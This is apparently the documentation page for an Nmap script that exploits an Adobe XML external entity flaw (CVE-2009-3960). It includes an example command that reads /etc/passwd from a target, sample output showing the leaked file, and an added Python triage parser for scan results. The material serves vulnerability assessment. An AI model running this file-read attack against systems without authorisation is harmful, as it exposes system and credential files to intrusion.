File http-vuln-cve2009-3960
Script types:
portrule
Categories:
exploit, intrusive
Download: http://nmap.org/svn/scripts/http-vuln-cve2009-3960.nse
User Summary
Exploits CVE-2009-3960, also known as Adobe XML External Entity Injection.
This vulnerability permits reading local files remotely. It is present in BlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0.
For more information see:
- http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
- http://www.osvdb.org/62292
- Metasploit module: auxiliary/scanner/http/adobe_xml_inject
Script Arguments
http-vuln-cve2009-3960.root
Points to the root path. Defaults to "/"
http-vuln-cve2009-3960.readfile
Target file to be read. Defaults to "/etc/passwd"
smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername
See the documentation for the smbauth library.
http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent
See the documentation for the http library.
vulns.showall
See the documentation for the vulns library.
Example Usage
nmap --script=http-vuln-cve2009-3960 --script-args http-vuln-cve2009-3960.root="/root/" <target>
Script Output
PORT   STATE SERVICE
80/tcp open  http
| http-vuln-cve2009-3960:
|   samples/messagebroker/http
|     <?xml version="1.0" encoding="utf-8"?>
|     <amfx ver="3"><body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits><string>timestamp</string><string>headers</string><string>body</string><string>correlationId</string><string>messageId</string><string>timeToLive</string><string>clientId</string><string>destination</string></traits><double>1.325337665684E12</double><object><traits><string>DSMessagingVersion</string><string>DSId</string></traits><double>1.0</double><string>5E037B49-540B-EDCF-A83A-BE9059CF6812</string></object><null/><string>root:x:0:0:root:/root:/bin/bash
|     bin:*:1:1:bin:/bin:/sbin/nologin
|     daemon:*:2:2:daemon:/sbin:/sbin/nologin
|     adm:*:3:4:adm:/var/adm:/sbin/nologin
|     lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin
|     sync:*:5:0:sync:/sbin:/bin/sync
|     shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
|     halt:*:7:0:halt:/sbin:/sbin/halt
|     mail:*:8:12:mail:/var/spool/mail:/sbin/nologin
|     news:*:9:13:news:/etc/news:
|     uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin
|     operator:*:11:0:operator:/root:/sbin/nologin
|     games:*:12:100:games:/usr/games:/sbin/nologin
|     gopher:*:13:30:gopher:/var/gopher:/sbin/nologin
|     ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin
|     nobody:*:99:99:Nobody:/:/sbin/nologin
|     nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin
|     vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin
|     pcap:!!:77:77::/var/arpwatch:/sbin/nologin
|     mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin
|     ...
|_
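The AMFX AcknowledgeMessage in the output above pairs each name in its <traits> list with the value elements that follow it in order, so the leaked file lands in the slot the traits assign to correlationId (timestamp, headers, body, correlationId, ...). The following is an added triage example, not code from the script or from Nmap: it decodes such a response into a dict so a scan reviewer can confirm a finding from the echoed field rather than by eyeballing the XML. The sample response is constructed from the output above, with the file body shortened and the trailing four fields (messageId, timeToLive, clientId, destination) filled with placeholder values.

```python
import xml.etree.ElementTree as ET

# Constructed sample modelled on the script output above; the passwd body is
# shortened and the last four fields are placeholders, not captured data.
SAMPLE_AMFX = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<amfx ver="3"><body targetURI="/onResult" responseURI="">'
    '<object type="flex.messaging.messages.AcknowledgeMessage">'
    '<traits><string>timestamp</string><string>headers</string>'
    '<string>body</string><string>correlationId</string>'
    '<string>messageId</string><string>timeToLive</string>'
    '<string>clientId</string><string>destination</string></traits>'
    '<double>1.325337665684E12</double>'
    '<object><traits><string>DSMessagingVersion</string><string>DSId</string>'
    '</traits><double>1.0</double>'
    '<string>5E037B49-540B-EDCF-A83A-BE9059CF6812</string></object>'
    '<null/>'
    '<string>root:x:0:0:root:/root:/bin/bash\nbin:*:1:1:bin:/bin:/sbin/nologin\n'
    '</string>'
    '<string>MESSAGE-ID-PLACEHOLDER</string><int>0</int><null/><null/>'
    '</object></body></amfx>'
)


def amfx_value(el):
    """Convert one AMFX value element into a Python value (subset of types)."""
    if el.tag == "null":
        return None
    if el.tag == "string":
        return el.text or ""
    if el.tag == "double":
        return float(el.text)
    if el.tag == "int":
        return int(el.text)
    if el.tag == "object":
        return decode_object(el)
    raise ValueError("unsupported AMFX type: %s" % el.tag)


def decode_object(obj):
    """Pair the trait names of an AMFX <object> with the values that follow."""
    children = list(obj)
    if not children or children[0].tag != "traits":
        raise ValueError("AMFX object without a leading <traits> element")
    names = [t.text for t in children[0]]
    values = children[1:]
    if len(values) != len(names):
        raise ValueError("trait/value count mismatch: %d vs %d" % (len(names), len(values)))
    return dict(zip(names, (amfx_value(v) for v in values)))


def parse_ack(amfx_text):
    """Return the AcknowledgeMessage of an AMFX response as a dict.
    ElementTree does not fetch external entities, so parsing a hostile
    response does not expose the reviewer's own tooling to XXE."""
    root = ET.fromstring(amfx_text)
    obj = root.find("./body/object")
    if obj is None or obj.get("type") != "flex.messaging.messages.AcknowledgeMessage":
        raise ValueError("not an AcknowledgeMessage response")
    return decode_object(obj)


def leaked_file(amfx_text):
    """Triage check: a multi-line correlationId means the server echoed file
    contents back, which confirms the finding; otherwise return None."""
    cid = parse_ack(amfx_text).get("correlationId")
    if not isinstance(cid, str) or "\n" not in cid:
        return None
    return cid
```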
Requires
Author: Hani Benhabiles
License: Same as Nmap--See http://nmap.org/book/man-legal.html